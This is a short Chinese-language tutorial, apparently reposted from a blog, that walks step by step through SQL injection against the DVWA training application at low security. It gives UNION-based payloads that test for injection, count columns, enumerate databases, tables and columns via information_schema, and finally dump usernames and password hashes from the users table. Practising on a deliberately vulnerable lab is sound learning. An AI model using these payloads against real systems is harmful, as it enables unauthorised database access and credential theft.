本文主要是介绍SQL Injection学习过程,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
DVWA 等级:low
1.判断是否存在注入
1‘ or 1=1 #
2.判断有多少字段
1' union select 1,2,3,4,5 #
1' union select 1,2,3 #
1' union select 1,2 #
说明有两个字段
3.判断回显位置
1'union select 222,666 #
4.查询版本号和当前数据库库名
1'union select version(),database() #
有时候版本不一样,注入构造的语句也不一样
5.查询所有数据库的库名
1'union select 1,(select group_concat(schema_name)from information_schema.schemata) #
6.查询当前数据库所有表名
1' union select 1,table_name from information_schema.tables where table_schema='root' #
7.查询表内所有字段
1' union select 1,column_name from information_schema.columns where table_schema='root' and table_name='users' #
8.查询内容
1' union select user,password from users #
这篇关于SQL Injection学习过程的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!